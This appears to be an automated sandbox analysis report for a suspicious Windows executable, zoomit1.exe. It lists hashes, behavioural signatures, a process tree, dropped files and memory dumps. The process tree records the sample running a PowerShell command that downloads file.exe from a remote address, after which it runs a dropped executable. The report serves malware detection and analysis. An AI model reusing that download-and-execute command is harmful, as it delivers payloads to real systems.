Analysis
-
max time kernel
180s -
max time network
190s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
07-06-2024 07:11
General
-
Target
zoomit1.exe
-
Size
1.1MB
-
MD5
6cf6aeff7114b4a42784a158713e1265
-
SHA1
f7b129e87e04a25347737c4f3003255b3b911434
-
SHA256
f7f2ee3096223b7ad97f07a8101bef57b207d684b0b7b5d0b887b930da2977ae
-
SHA512
bda17c801215cde2c71609038298fcc8009ff2bd04ce8c86e6c92dc74e6323011f9c116fcd2a29acd56a42bca9397a41c78e974805d4a9caf8459ea3b24d4ff9
-
SSDEEP
24576:wIqNc0YfyGJ8h/zmH5WkH1mENVH2PfSHAlP:wdc0YfRi9cWk8Eb2nlP
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Executes dropped EXE 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\zoomit1.exe"C:\Users\Admin\AppData\Local\Temp\zoomit1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Invoke-WebRequest -Uri 'http://192.168.207.138:8000/file.exe' -OutFile 'file.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\zoomit164.exe"C:\Users\Admin\AppData\Local\Temp\zoomit164.exe" "C:\Users\Admin\AppData\Local\Temp\zoomit1.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.0.1580039793\95333606" -parentBuildID 20230214051806 -prefsHandle 1772 -prefMapHandle 1764 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95184ee6-d087-4404-89aa-2cdefc04fc0f} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 1864 1b163822b58 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.1.51309686\1613760634" -parentBuildID 20230214051806 -prefsHandle 2360 -prefMapHandle 2348 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66f868f5-70dc-4926-aa3c-86d6d6e4e4c5} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 2388 1b156a89f58 socket3⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.2.671652332\376147480" -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c34af5d-72a4-4c9e-aa5e-047430a1bcae} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 2928 1b1660dde58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.3.793709217\1147492664" -childID 2 -isForBrowser -prefsHandle 3568 -prefMapHandle 3564 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b64fd48-7329-464b-84ef-ed8c39a294cb} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 3580 1b168dcd758 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.4.892180428\1466353709" -childID 3 -isForBrowser -prefsHandle 5036 -prefMapHandle 5020 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1bb0d79-690f-457a-82f5-55761f1a82ac} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 5044 1b16aeb3958 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.5.190457939\135202903" -childID 4 -isForBrowser -prefsHandle 5188 -prefMapHandle 5192 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fc4bb8e-8730-40e1-9fc4-7fbbd47a8e15} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 5176 1b16b84be58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.6.2081743517\1732931139" -childID 5 -isForBrowser -prefsHandle 5392 -prefMapHandle 5396 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9e44c55-18da-430c-aabf-e031063187c2} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 5160 1b16b849d58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.7.1920441698\1871941432" -childID 6 -isForBrowser -prefsHandle 5852 -prefMapHandle 5848 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beaa5f11-8507-443a-85b0-3038bfefba9d} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 5860 1b1654e2958 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4312.8.1715543092\730844280" -childID 7 -isForBrowser -prefsHandle 4828 -prefMapHandle 4816 -prefsLen 28175 -prefMapSize 235121 -jsInitHandle 932 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f54ab05-0c7c-403d-aa75-2a4408c94b51} 4312 "\\.\pipe\gecko-crash-server-pipe.4312" 4752 1b156a75f58 tab3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\mg2c1myw.default-release\activity-stream.discovery_stream.json.tmpFilesize
31KB
MD5e6fb92f1e5fa34184e8b3bc363436c6e
SHA1f76fc95107d1b275e577924be79fb111a34fa790
SHA256d803c4163ab1af8690ec18e3d50301bfc8136d4a3d91d5099ffe395143cc4896
SHA512238b79b195f37bfd93c87cf12ad9a217efe767f9ffd2607867168d75b89e091aab40a9dcb5f3df47577add01530bebc4517cbf8f145c7921bd599e483598556a
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\mg2c1myw.default-release\cache2\doomed\1408Filesize
15KB
MD51bf899170e365ccc403218547ee260fe
SHA13a7c9add90e7d4d141f823536f647ac707386760
SHA2564c32798d5b22854b17d4f95174ab00fff939fffe65583f53159090c791a23534
SHA5127e930c9061bea8acfc8dbdaa4e06f852491cb87876ea73ad7634f6f407de10f171ba4f676d18a1da79dd3c2da0af511e325f1daa2a3709070cd179727b6a450d
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\mg2c1myw.default-release\cache2\entries\A014AE046DC280D70FDEECC4F0B07DECF2537D90Filesize
311KB
MD557c3fa42330afe8a5436908bf2d6d835
SHA1e06b8201294921e0ef998bd34e178e9ddd48d450
SHA256d245a901b2d463a15e19c4592d42bd333df7879f39d5d82b8d3abea0d173175a
SHA5127a74c396bfbf54d00f8af7f603f72c7ee9cce8cd800393714316740ab02c2480e7dea88546a654287994071b82b8470c58f68649ebe3e5c6a3043f0ea4d7838c
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\mg2c1myw.default-release\cache2\entries\D8932771DDB9877DA127C536ED20BF75F614C14FFilesize
10KB
MD5101af4c1f00260df88bbdff08dde3e33
SHA15de2e7d0d842c99d0225fc98657ff1630ab8e80d
SHA256b48801cc976cc86b8a14cb9974402dadb8915b3ae1d36d4badf5b45d0b8e804f
SHA512d9f675a6eb2f64f299cff1fccfee8d5a312d0218d8ee97ff378cf3de833346ed6d6eb642a1b73aa8dee4114d24620821873178e58ac22fa8600db4cc8e957249
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xb13pps.3dd.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\zoomit164.exeFilesize
610KB
MD57c0b29edf85c834d59276a20068e72e0
SHA1fa31f4f303e98f77e28f883a2fd2341859338d5b
SHA2562e4476fd04d7273b0d4478e9a40701b6650a7fd507140b604f64380e0315777f
SHA512e1092bc30f5c5e6a9b437d97a039241a9f4b9d86dace7804dc7d8225cb4c2c3b92695ce94afaced10e28f1523cb9d45d6748d10cac40898b1e4ce1ff322d19dc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\prefs-1.jsFilesize
6KB
MD535cdca83de17f3ae3dbfaa17de696a96
SHA1380feaf0841a661d8798911ee84b886e6c01c894
SHA2568ecdfb44ba93bdb90a845c3864278bfc1183527836960cf4139f9d6934b1a694
SHA51253e79fc40a6994b43b976aa70465658e2d6ce142353984587f16f5d6858fb0a32aa66c282f20c639beb9fa9764dcbe1842c17e475c8255a06d172719270789bd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\prefs-1.jsFilesize
7KB
MD59820d8906520c5231638fe56fb840186
SHA1288e8ffcc98613fa4a71929c30f436be42765923
SHA25683be17d041416398e89dd9d06317061789d5db1672c4b8b3d159d76c14d73341
SHA5120b9e6bb48d364af4fc19426b563c36434153e251110a46145ab4ae729f6d343b641c658e97f10c8e45af0fc08eb1cee177fce04504a622a94938b81b734ed80e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\prefs-1.jsFilesize
7KB
MD5357ae2c4af12105cc638230db03369b4
SHA1c3e63f58f6cf3288104e231c3746f2a9816dae2d
SHA256b06db7cf9e500bc31ea6c1cdbbc8fa443b99ab99421516baa2ff29fb39402340
SHA512f49363382b71b6f8075243e5d81bc91ac7735f770218d84cd1e33ff74006024c559447876a38e97d379bad9050c4ce6efe37ed284387c119be7794f67fc1e5bb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionCheckpoints.json.tmpFilesize
259B
MD5e6c20f53d6714067f2b49d0e9ba8030e
SHA1f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA25650a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore-backups\recovery.jsonlz4Filesize
4KB
MD5e2882e7d552799c5ca26dee3108d995d
SHA160804ada6a18f1d2a5a4c74ad67e0f84ee8f25c3
SHA2562a67aa3531df4475ef7763ad2d88eb42ee962d14916fd1ecdfe134f5b9c696a5
SHA512402819b9da4b69b4eb2ec39194e29ffe481b7c34477f9bbd743910daf28780eb726d8da703b6e4eeb6b4ea52c3f8e8312ee7a95291cf3ce2118a3070fe8f01a4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore-backups\recovery.jsonlz4Filesize
11KB
MD5a2399e83684f0b2c2ead0ada682c315f
SHA1a1636ffb35322388755673098c4828fe9b570f8c
SHA25630455cd0ca064509191e393c67f9ac6f96c9ba53e21bd0096cdcf46458da6a4a
SHA512a187cc65121dc87e99fcc9933bbee9b0fd1e8fa238d69cedb9114b101b030bb2b3b6cf20fcb316b336df6644c69dab1270f18282218ae01d8e5ff2b518628fe2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore-backups\recovery.jsonlz4Filesize
3KB
MD52456985164a1754c962b1505c13bf802
SHA155e5c203125a12e25ac0dd9f6db5b34629554755
SHA25652b940a68c34353f2fea5cef73498029d66b5d8aa730e1ccd5c26daa05a7fceb
SHA51292996af9de3dd9aceb796bedcd8e5a6e95cabd184a2365d61634d170eac5132e95ffd37d5f3707ea716bc2fc0b586bccbf936f13b641fc70e40ebe0ccae69c62
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore-backups\recovery.jsonlz4Filesize
11KB
MD508d971b1ff17698ccab230a7018caa78
SHA158525d98c0af56041f9ffbed39027ee8e5e8bd2d
SHA256bc8fc9b385f341df15e2ca931278de59c7f88ddc609467c0dac8bd31bfd64d7a
SHA5124edf0975d2ce53d10cd50b85b7c59cba8a2bf12a33cb96076c72fa1db10e0c471522f704b27bcebacefc623b927a1c0d0944a454aa783fa6ac97c78ab72eee0c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore.jsonlz4Filesize
95KB
MD5045024dc126274e7fb4493a1faac33a4
SHA188a486111dd965c32a817754ac402336ebb21ef1
SHA256df068b1dd0f541d609ea7f64068d994bc0dc0f78cd76a2b220f93d86140ca000
SHA5128386ef871c1c612e43a17e0955c3b25d6ed067cc6f721841df9829fadb19107393c85f0f78b0ed4d860596ba9eef4054b1332862d155ae2b16d5ebe62a3f2e63
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\storage\default\https+++www.linkedin.com\idb\1803601664sreeqbumeunNce.sqliteFilesize
48KB
MD5de3e7c7117f283507fbdc40c37f88b0e
SHA10fa153ff8849ec3f8ce159ba49f8e9bfdc0c9537
SHA2564129aadaaea22c926e6557635b3b064f2ba9a26a03af1f61474fff1c302af97f
SHA512f1ffc2f503fb3a637b8bc1a9f0a3172fd644ff3d6dfbd136dbb3384cef620259cc4bdd3d0060d7eebdf04de6ece92661580e07d2acd7d2897df5864ee3330f3c
-
memory/2252-7-0x0000000004E90000-0x0000000004EF6000-memory.dmpFilesize
408KB
-
memory/2252-8-0x0000000005580000-0x00000000055E6000-memory.dmpFilesize
408KB
-
memory/2252-21-0x0000000007300000-0x000000000797A000-memory.dmpFilesize
6.5MB
-
memory/2252-20-0x0000000005AC0000-0x0000000005B0C000-memory.dmpFilesize
304KB
-
memory/2252-19-0x0000000005A90000-0x0000000005AAE000-memory.dmpFilesize
120KB
-
memory/2252-18-0x00000000055F0000-0x0000000005947000-memory.dmpFilesize
3.3MB
-
memory/2252-22-0x0000000005F90000-0x0000000005FAA000-memory.dmpFilesize
104KB
-
memory/2252-39-0x00000000739C0000-0x0000000074171000-memory.dmpFilesize
7.7MB
-
memory/2252-2-0x00000000739CE000-0x00000000739CF000-memory.dmpFilesize
4KB
-
memory/2252-9-0x00000000739C0000-0x0000000074171000-memory.dmpFilesize
7.7MB
-
memory/2252-6-0x0000000004BF0000-0x0000000004C12000-memory.dmpFilesize
136KB
-
memory/2252-5-0x00000000739C0000-0x0000000074171000-memory.dmpFilesize
7.7MB
-
memory/2252-4-0x0000000004F50000-0x000000000557A000-memory.dmpFilesize
6.2MB
-
memory/2252-36-0x00000000739C0000-0x0000000074171000-memory.dmpFilesize
7.7MB
-
memory/2252-3-0x00000000026C0000-0x00000000026F6000-memory.dmpFilesize
216KB
-
memory/2252-35-0x00000000739CE000-0x00000000739CF000-memory.dmpFilesize
4KB